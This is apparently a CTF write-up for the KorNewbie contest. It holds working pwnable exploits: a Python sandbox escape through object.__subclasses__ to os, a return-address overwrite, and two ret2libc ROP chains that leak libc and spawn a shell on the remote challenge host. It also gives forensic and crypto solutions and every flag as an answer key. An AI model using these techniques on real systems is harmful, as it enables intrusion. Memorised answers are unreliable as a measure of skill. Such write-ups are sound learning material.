Pwnable: python_jail
# Two separate inputs submitted to the python_jail service, one per line.
# Each input builds a name->class map from object.__subclasses__(), picks the
# class named 'StreamReaderWriter', reads 'sys' out of its
# __init__.__globals__ and takes the already-loaded module at sys.modules['os'].
# The key is spelled 'o'+'s'; presumably the jail rejects the literal text
# "os" -- the filter itself is not shown on this page.
# Defensive takeaway: name filters and stripped builtins do not confine code
# evaluated in-process, because introspection reaches every loaded module.
# Confinement has to come from the OS (unprivileged process, container, seccomp).
#
# Input 1: list ./home/python_jail with `ls -la`, waiting for it to finish (P_WAIT).
o={x.__name__:x for x in object.__subclasses__()}['StreamReaderWriter'].__init__.__globals__['sys'].modules['o'+'s'];o.spawnlp(o.P_WAIT, 'ls', 'ls', '-la', './home/python_jail')
# Input 2: print ./home/python_jail/flag with `cat`, reached the same way.
o={x.__name__:x for x in object.__subclasses__()}['StreamReaderWriter'].__init__.__globals__['sys'].modules['o'+'s'];o.spawnlp(o.P_WAIT, 'cat', 'cat', './home/python_jail/flag')
Flag: KorNewbie{H311o_h0w_@r3_y0u_d0lng?}
Pwnable: babypwn
def exploit3():
    """Connect to the babypwn service, send one overflow payload, go interactive.

    The payload is 0x400+8 filler bytes followed by the packed 64-bit value
    0x400636. Presumably the filler covers a 0x400-byte stack buffer plus the
    saved frame pointer, so the packed value replaces the saved return
    address; the binary is not shown on this page, so confirm against it.

    NOTE(review): a hard-coded return target implies the binary is not
    position-independent and the function has no stack canary (inferred, not
    shown here). Either mitigation, or a length-bounded read, stops this input.
    NOTE(review): str + p64() relies on Python 2 string semantics; under
    Python 3 pwntools packs to bytes -- confirm the interpreter.
    """
    print('[Exploit] Challenge: babypwn')
    io = connect('prob.vulnerable.kr', 20035)

    filler = 'A'*(0x400+8)
    # What lives at 0x400636 is not shown on this page.
    payload = filler + p64(0x400636)

    io.sendline(payload)
    io.interactive()
Flag: KorNewbie{Th1s_1S_R34L_Fl4g_C0ngr4tu14ti0n5!}
Pwnable: OneShot_OneKill
def exploit1():
    """Run the two-stage OneShot_OneKill payload against the remote service.

    Stage 1 overflows with 0x12C+4 filler bytes and a chain of 32-bit words
    that calls puts on the GOT slots of gets and puts, then returns to
    0x804851B (presumably the vulnerable routine, so a second payload can be
    sent -- confirm against the binary). The two leaked pointers are printed.
    Stage 2 derives the libc base from the gets leak using offsets for the
    libc build named in the comment below, and returns into system with the
    address of the "/bin/sh" string as its argument.

    NOTE(review): the chain depends on fixed PLT/GOT/gadget addresses and an
    unprotected saved return address, i.e. no PIE and no stack canary
    (inferred, not shown). The libc offsets hold only for that exact build.
    NOTE(review): str + p32() relies on Python 2 string semantics; under
    Python 3 pwntools packs to bytes -- confirm the interpreter.
    """
    print('[Exploit] Challenge: OneShot_OneKill\n')
    io = connect('prob.vulnerable.kr', 20026)

    # Fixed addresses taken from the challenge binary.
    puts_plt = 0x80483D0
    gets_got = 0x804A010
    puts_got = 0x804A014
    pop_1_ret = 0x8048399
    filler = 'A'*(0x12C+4)

    # Stage 1: print both GOT entries, then return to 0x804851B.
    leak_chain = (
        puts_plt, pop_1_ret, gets_got,
        puts_plt, pop_1_ret, puts_got,
        0x804851B,
    )
    payload = filler
    for word in leak_chain:
        payload += p32(word)
    io.sendline(payload)

    io.recvuntil('it?\n')
    io.readline()  # one line is discarded before the leaked pointers
    gets_mapped = u32(io.readline()[0:4])
    puts_mapped = u32(io.readline()[0:4])  # only printed, not used below
    print('[Exploit] gets = '+hex(gets_mapped))
    print('[Exploit] puts = '+hex(puts_mapped))

    # libc6-i386_2.23-0ubuntu11_amd64
    libc_base = gets_mapped-0x5E890
    system_mapped = libc_base+0x3A940
    bin_sh_mapped = libc_base+0x15902B
    print('[Exploit] libc_base = '+hex(libc_base))
    print('[Exploit] system = '+hex(system_mapped))
    print('[Exploit] str_bin_sh = '+hex(bin_sh_mapped))

    # Stage 2: same filler, then system / return-address slot / argument.
    payload = filler
    for word in (system_mapped, pop_1_ret, bin_sh_mapped):
        payload += p32(word)
    io.sendline(payload)
    io.interactive()
Flag: KorNewbie{Nice_Sh0T_N3wbie_Pwner!$#}
Pwnable: dRop_the_beat
def exploit2():
    """Run the two-stage dRop_the_beat payload against the remote service.

    Each payload is delivered the same way: wait for the prompt ending in
    '..!\\n', answer '1', wait for '!!\\n', then write the raw payload.
    Stage 1 overflows with 0x64+4 filler bytes, calls puts on the GOT slot of
    read and returns to 0x804853B (presumably the vulnerable routine --
    confirm against the binary). Stage 2 derives the libc base from the read
    leak and returns into system with the address of "/bin/sh".

    NOTE(review): the chain depends on fixed PLT/GOT/gadget addresses and an
    unprotected saved return address, i.e. no PIE and no stack canary
    (inferred, not shown). The libc offsets hold only for the build named below.
    NOTE(review): str + p32() relies on Python 2 string semantics; under
    Python 3 pwntools packs to bytes -- confirm the interpreter.
    """
    print('[Exploit] Challenge: dRop_the_beat')
    io = connect('prob.vulnerable.kr', 20002)

    def deliver(data):
        # Walk the menu to the input prompt, then send the payload unframed.
        io.recvuntil('..!\n')
        io.sendline('1')
        io.recvuntil('!!\n')
        io.write(data)

    # libc6-i386_2.23-0ubuntu11_amd64
    puts_plt = 0x80483E0
    read_got = 0x804A00C
    pop_1_ret = 0x80483B9
    filler = 'A'*(0x64+4)

    # Stage 1: print the GOT entry of read, then return to 0x804853B.
    payload = filler
    for word in (puts_plt, pop_1_ret, read_got, 0x804853B):
        payload += p32(word)
    deliver(payload)

    io.recvuntil('AWESOME!\n')
    read_mapped = u32(io.readline()[0:4])
    print('[Exploit] read = '+hex(read_mapped))

    libc_base = read_mapped-0xD4350
    system_mapped = libc_base+0x3A940
    bin_sh_mapped = libc_base+0x15902B
    print('[Exploit] libc_base = '+hex(libc_base))
    print('[Exploit] system = '+hex(system_mapped))
    print('[Exploit] str_bin_sh = '+hex(bin_sh_mapped))

    # Stage 2: same filler, then system / return-address slot / argument.
    payload = filler
    for word in (system_mapped, pop_1_ret, bin_sh_mapped):
        payload += p32(word)
    deliver(payload)
    io.interactive()
Flag: KorNewbie{R0PR0PR@P~@!#GrE4T_3EaT_!ROPROPROP*@(#}
Reversing: LOW_MIPS
MIPS Assembly, big endian
# Challenge listing (MIPS, big endian). By register number: $29 is the stack
# pointer, $0 is the hard-wired zero register.
# The question that leads to the answer 16 is not shown on this page.
# Reserve 8 bytes of stack: $29 = $29 - 8.
addiu $29,$29,-8
# Destination is $0, which always reads as zero, so $1 + 10 is discarded.
addi $0,$1,10
# $1 = $1 + 2.
addi $1,$1,2
# Store the word in $1 at address $29 + 0.
sw $1,0($29)
# $1 = $2 + 4; the word stored above is not affected.
addi $1,$2,4
# Store the word in $2 at address $29 + 4.
sw $2,4($29)
# Release the 8 bytes: $29 = $29 + 8.
addiu $29,$29,8
Flag: KorNewbie{16}
Reversing: BABYREV
#define _CRT_SECURE_NO_WARNINGS
#include <stdio.h>
#include <stdlib.h>
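/*
 * Recover the BABYREV flag one character at a time by using babyrev.exe as
 * an oracle: for each position 10..34, try every byte 32..127, run the
 * binary on the candidate and keep the byte whose output at that position
 * equals the reference byte read from flag.txt.
 *
 * flag.txt presumably holds the encoded flag shipped with the challenge, and
 * babyrev.exe presumably writes its result to enc.txt; neither is shown here.
 * The approach assumes output byte i does not depend on later input bytes.
 *
 * Returns 0 on success, EXIT_FAILURE if a required file cannot be opened or
 * flag.txt is shorter than 36 bytes. The original dereferenced a NULL FILE*
 * in those cases and compared uninitialised bytes after a short read.
 */
int main() {
    /* The literal is exactly 36 characters, so dec has no NUL terminator;
       it is only ever used with explicit lengths. */
    char dec[36] = "korNewbie{AAAAAAAAAAAAAAAAAAAAAAAAA}";
    char flag[36];
    FILE *flagf = fopen("flag.txt", "rb");
    if (flagf == NULL) {
        perror("flag.txt");
        return EXIT_FAILURE;
    }
    if (fread(flag, 1, 36, flagf) != 36) {
        fprintf(stderr, "flag.txt: expected 36 bytes\n");
        fclose(flagf);
        return EXIT_FAILURE;
    }
    fclose(flagf);
    setvbuf(stdout, NULL, _IONBF, 0);
    setvbuf(stderr, NULL, _IONBF, 0);
    for (int i=10 ; i<=34 ; i++) {
        int found = 0;
        for (int c=32 ; c<=127 ; c++) {
            dec[i] = c;
            FILE *in = fopen("t.txt", "wb");
            if (in == NULL) {
                perror("t.txt");
                return EXIT_FAILURE;
            }
            fwrite(dec, 1, 36, in);
            fclose(in);
            /* Fixed command string, no external input reaches the shell.
               This executes the challenge binary, so run it in a throwaway VM. */
            system("babyrev.exe t.txt >nul");
            FILE *out = fopen("enc.txt", "rb");
            if (out == NULL) {
                perror("enc.txt");
                return EXIT_FAILURE;
            }
            char enc[36];
            size_t got = fread(enc, 1, 36, out);
            fclose(out);
            /* Only compare when byte i was actually read. */
            if (got > (size_t)i && flag[i] == enc[i]) {
                found = 1;
                break;
            }
        }
        if (!found) {
            /* dec[i] is left at the last candidate (127), as in the original. */
            fprintf(stderr, "Char %d: no candidate matched\n", i);
        }
        printf("Char %d: %c\n", i, dec[i]);
    }
    printf("\nFlag: ");
    for (int i=0 ; i<36 ; i++) putchar(dec[i]);
    return 0;
}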
Flag: korNewbie{ba8y_rev_i$_very_Very_eZ!}
Webhacking: Normal_Host
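URL escape code (percent-encoding): %6E decodes to 'n', so the host below reads as normalflag.iwinv.net once decoded.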
url = %6Eormalflag.iwinv.net
Flag: KorNewbie{H0$7_$P1it_A774cK_U$3s_N0RM^liZ47ioN&##$%%!}
Forensic: Top Secret
strings -n 10 ./Windows\ 7\ Enterprise\ K-b94208dd.vmem | grep -i 'KorNewbie'
Flag: KorNewbie{OH..You_Know_B4sic_0F_M3mory_Forensics!}
Forensic: Contact point
Unpack file with extractor.
Location: /apps/com.android.browser/db/browser2.db
SQLite 3.x database
Google search history: Jeju_international_airport
Flag: KorNewbie{Jeju_international_airport}
Forensic: Find The Plain
Packet filter: ftp
Used FTP commands: USER ftpdir; PASS root; STOR badguy.txt
Sent data is stored in packet 3254.
Data
7J2067O06rKMIOyVjO2MjO2MgOydmCDsi6Dsg4HsoJXrs7TripQg67CR7J2YIOyjvOyGjOyXkCDrqqjrkZAg64u07JWE64aT7JWY64SkLiDqsbTtiKzrpbwg67mM7KeA7JuM7YSwLi4gDQpodHRwczovL3Bhc3RlYmluLmNvbS83MHlER2lSUw==
Decoded with BASE64
이보게 알파팀의 신상정보는 밑의 주소에 모두 담아놓았네. 건투를 빌지워터.. https://pastebin.com/70yDGiRS
The string provided at the link is: k459iki6m5j094m2lmkhjmi9527l81ml
There is also a comment in packet 3229 (the STOR command) that implies Caesar encryption with key=7; shifting each letter of the string back by 7 gives the MD5 hash below.
MD5 Hash: d459bdb6f5c094f2efdacfb9527e81fe
Crack: The new boss is IronDragon
Flag: KorNewbie{root_IronDragon}
Forensic: REC
The file signature is missing. Insert the 2-byte 'MZ' signature at the very start of the file, then run the executable.
Flag: KorNewbie{Recover_Signature}
Misc: Catch Me
Analyze frame by frame.
119 48 119 95 101 52 103 49 101 95 51 121 51 > w0w_e4g1e_3y3
Flag: KorNewbie{w0w_e4g1e_3y3}
Misc: BiMilCode
ASCII shift with hidden key
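# Undo the BiMilCode shift for one 8-byte sample.
# Each output character is chr(32 + e - s), where e is a byte of _enc and s is
# the byte of _space at the same position.
# _space is presumably the ciphertext obtained for an all-spaces (0x20) input,
# which makes s - 32 the per-position key; how it was captured is not shown here.
_enc = 'c5 97 84 81 68 6a 67 5d'
_space = '7b 56 43 79 26 29 23 46'

# Parse each hex dump once instead of re-splitting it on every iteration.
enc_bytes = [int(tok, 16) for tok in _enc.split()]
space_bytes = [int(tok, 16) for tok in _space.split()]

ans = ''.join(chr(32 + e - s) for e, s in zip(enc_bytes, space_bytes))
print('\n'+ans)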
Flag: KorNewbie{Nace_I_believed_it}